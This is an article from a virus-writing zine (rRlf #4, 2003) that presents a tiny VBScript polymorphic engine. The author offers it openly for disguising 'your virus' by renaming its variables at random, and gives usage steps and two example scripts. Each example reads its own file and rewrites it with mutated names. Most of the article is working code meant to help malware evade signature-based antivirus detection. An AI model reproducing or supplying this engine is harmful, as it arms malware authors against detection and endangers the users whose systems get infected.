<html>
<head>
<title>rRlf #4</title>
</head>
<body text="#ffffff" link="#ff0f0f" vlink="#ff0f0f" alink="#ff0f0f" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>Redemption</i>
<br><table cellpadding="9">
<tr>
<th><a href="rRlf.13.html">Last article</a></th>
<th><a href="rRlf.01.html">Table of contents</a></th>
<th><a href="rRlf.15.html">Next article</a></th>
</tr>
</table>
</center>
<p><b><u>Kefi's tiny vbscript poly by Kefi</u></b>
<p><pre>
                                                                      smallest vbs poly
                                                                   Kefi // June 6, 2003

  Hello, here's a new polymorph for all of ya'. I'm pretty sure  that it's the smallest
 one out, at least for visual basic script. With it's four lines  of code,  it replaces
 variables within a 'chunk' of text with new,  random letters with a random length-3 to
 10 characters. Just like the 'vamp' and 'jsmp' macro polys,  and the 'jap', and 'kvpe'
 vbs polys.

  I think, by now, you understand how to use these things, but if not here it is again:
 1) make a list of all variables in your virus
 2) add them to the array of the second line, like this: ',"variable1")' ... ect.
 3) make a call to the poly like this: 'code = ktvp(othercode)'

 For an example, look at 'example1.vbs' or 'example2.vbs'.


 .[ code starts ].

function ktvp(a1)
for each a2 in array("kvpt","a1","a2","a3","a4")
randomize: for a3 = 1 to 3 + int( 7 * rnd): a4 = a4 & chr(97 + int(26 * rnd)): next
a1 = replace(a1,a2,a4): a4 = ""
next: ktvp = a1
end function

' Kefi's tiny vbs poly [ktvp]

 .[ code stops ].

  -specail greets:
  jackie - jsmp, jap
  VincodES - vamp


                   (c) Kefi, 2003 || http://vx.netlux.org/~kefi

</pre>
<p><u>file example1.vbs:</u>
<p><pre>
set a1 = createobject("scripting.filesystemobject")
a2 = a1.opentextfile(wscript.scriptfullname,1).readall()
for each a3 in array("a1","a2","a3","a4","a5")
 randomize: for a4 = 1 to 3 + int( 7 * rnd): a5 = a5 & chr(97 + int(26 * rnd)): next
 a2 = replace(a2,a3,a5): a5 = ""
next
a1.opentextfile(wscript.scriptfullname,2).write(a2)

' Kefi's tiny vbs poly [ktvp]

</pre>
<p><u>file example2.vbs:</u>
<p><pre>
set a1 = createobject("scripting.filesystemobject")
a2 = a1.opentextfile(wscript.scriptfullname,1).readall()
a1.opentextfile(wscript.scriptfullname,2).write(ktvp(a2))

function ktvp(a3)
for each a4 in array("kvpt","a1","a2","a3","a4","a5","a6")
 randomize: for a5 = 1 to 3 + int( 7 * rnd): a6 = a6 & chr(97 + int(26 * rnd)): next
 a3 = replace(a3,a4,a6): a6 = ""
next: ktvp = a3
end function
</pre>
</body>
</html>
